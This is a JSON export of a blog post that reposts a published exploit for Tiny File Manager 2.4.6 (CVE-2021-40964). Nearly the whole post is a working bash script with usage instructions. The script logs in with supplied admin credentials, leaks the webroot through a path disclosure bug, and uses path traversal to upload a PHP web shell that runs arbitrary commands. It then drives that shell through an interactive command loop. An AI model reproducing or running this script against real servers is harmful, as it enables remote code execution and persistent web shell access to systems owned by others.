{"id":21860,"date":"2022-03-16T22:08:13","date_gmt":"2022-03-16T19:08:13","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/166330\/tfm246-shell.txt"},"modified":"2022-03-19T09:40:19","modified_gmt":"2022-03-19T06:10:19","slug":"tiny-file-manager-2-4-6-shell-upload","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/tiny-file-manager-2-4-6-shell-upload\/","title":{"rendered":"Tiny File Manager 2.4.6 Shell Upload"},"content":{"rendered":"

# Exploit Title: Tiny File Manager 2.4.6 – Remote Code Execution (RCE)
\n# Date: 14\/03\/2022
\n# Exploit Author: FEBIN MON SAJI
\n# Software Link: https:\/\/github.com\/prasathmani\/tinyfilemanager
\n# Version: Tiny File Manager <= 2.4.6
\n# Tested on: Ubuntu 20.04
\n# CVE : CVE-2021-40964
\n# Reference: https:\/\/febin0x4e4a.wordpress.com\/2022\/01\/23\/tiny-file-manager-authenticated-rce\/<\/p>\n

#!\/bin\/bash<\/p>\n

check(){<\/p>\n

which curl
\nif [ $? = 0 ]\nthen
\nprintf “[\u2714] Curl found! \\n”
\nelse
\nprintf “[\u274c] Curl not found! \\n”
\nexit
\nfi<\/p>\n

which jq
\nif [ $? = 0 ]\nthen
\nprintf “[\u2714] jq found! \\n”
\nelse
\nprintf “[\u274c] jq not found! \\n”
\nexit
\nfi
\n}
\nusage(){<\/p>\n

printf ”
\nTIny File Manager Authenticated RCE Exploit.<\/p>\n

By FEBIN<\/p>\n

$0 <URL> <Admin Username> <Password><\/p>\n

Example: $0 http:\/\/files.ubuntu.local\/index.php admin \\”admin@123\\”<\/p>\n


\n}<\/p>\n

log-in(){
\nURL=$1
\nadmin=$2
\npass=$3
\ncookie=$(curl “$URL” -X POST -s -d “fm_usr=$admin&fm_pwd=$pass” -i | grep “Set-Cookie: ” | sed s\/”Set-Cookie: “\/\/g | tr -d ” ” | tr “;” “\\n” | head -1)<\/p>\n

if [ $cookie ]\nthen
\nprintf “\\n[+] Login Success! Cookie: $cookie \\n”
\nelse
\nprintf “\\n[-] Logn Failed! \\n”
\nfi<\/p>\n

URL=${URL}
\n}<\/p>\n

find_webroot(){<\/p>\n

webroot=$(curl -X POST “$URL?p=&upload” -d “type=upload&uploadurl=http:\/\/vyvyuytcuytcuycuytuy\/&ajax=true” -H “Cookie: $cookie” -s | jq | grep file | tr -d ‘”‘ | tr -d “,” | tr -d ” ” | sed s\/”file:”\/\/g | tr “\/” “\\n” | head –lines=-1 | tr “\\n” “\/” )<\/p>\n

if [ $webroot ]\nthen
\nprintf “\\n[*] Try to Leak Web root directory path \\n\\n”
\nprintf “[+] Found WEBROOT directory for tinyfilemanager using full path disclosure bug : $webroot \\n\\n”
\nelse
\nprintf “[-] Can’t find WEBROOT! Using default \/var\/www\/html \\n”
\nwebroot=”\/var\/www\/html”
\nfi
\n}<\/p>\n

upload(){<\/p>\n

#webroot=”\/var\/www\/tiny\/”
\nshell=”shell$RANDOM.php”
\necho “<?php system(\\$_REQUEST[‘cmd’]); ?>” > \/tmp\/$shell<\/p>\n

curl $URL?p= -X POST -s -H “User-Agent: Mozilla\/5.0 (X11; Linux x86_64; rv:78.0) Gecko\/20100101 Firefox\/78.0” -b $cookie -F “p=” -F “fullpath=..\/..\/..\/..\/..\/..\/..\/..${webroot}\/${shell}” -F “file=@\/tmp\/$shell” | grep “successful”<\/p>\n

}<\/p>\n

exploit(){<\/p>\n

WEB_URL=$(printf “$URL” | tr “\/” “\\n” | head –lines=-1 | tr “\\n” “\/”)<\/p>\n

upload<\/p>\n

if [ $? = 0 ]\nthen
\nprintf “[+] File Upload Successful! \\n”
\nelse
\nprintf “[-] File Upload Unsuccessful! Exiting! \\n”
\nexit 1
\nfi<\/p>\n

printf “[+] Checking for the shell \\n”<\/p>\n

curl ${WEB_URL}\/${shell}?cmd=echo%20found -s | head -1 | grep “found” >\/dev\/null
\nif [ $? = 0 ]\nthen
\nprintf “[+] Shell found ${WEB_URL}\/$shell \\n”
\nelse
\nprintf “[-] Shell not Found! It might be uploaded somewhere else in the server or got deleted. Exiting! \\n”
\nexit 2
\nfi<\/p>\n

printf “[+] Getting shell access! \\n\\n”<\/p>\n

while true
\ndo
\nprintf “$> ”
\nread cmd
\ncurl ${WEB_URL}\/$shell -s -X POST -d “cmd=${cmd}”
\ndone
\n}<\/p>\n

if [ $1 ] && [ $2 ] && [ $3 ]\nthen
\ncheck
\nlog-in $1 $2 $3<\/p>\n

find_webroot<\/p>\n

exploit
\nelse
\nusage
\nfi<\/p>\n","protected":false},"excerpt":{"rendered":"

# Exploit Title: Tiny File Manager 2.4.6 – Remote Code Execution (RCE) # Date: 14\/03\/2022 # Exploit Author: FEBIN MON SAJI # Software Link: https:\/\/github.com\/prasathmani\/tinyfilemanager # Version: Tiny File Manager <= 2.4.6 # Tested on: Ubuntu 20.04 # CVE : CVE-2021-40964 # Reference: https:\/\/febin0x4e4a.wordpress.com\/2022\/01\/23\/tiny-file-manager-authenticated-rce\/ #!\/bin\/bash check(){ which curl if [ $? = 0 ] then …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-21860","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/21860","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=21860"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/21860\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=21860"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=21860"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=21860"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}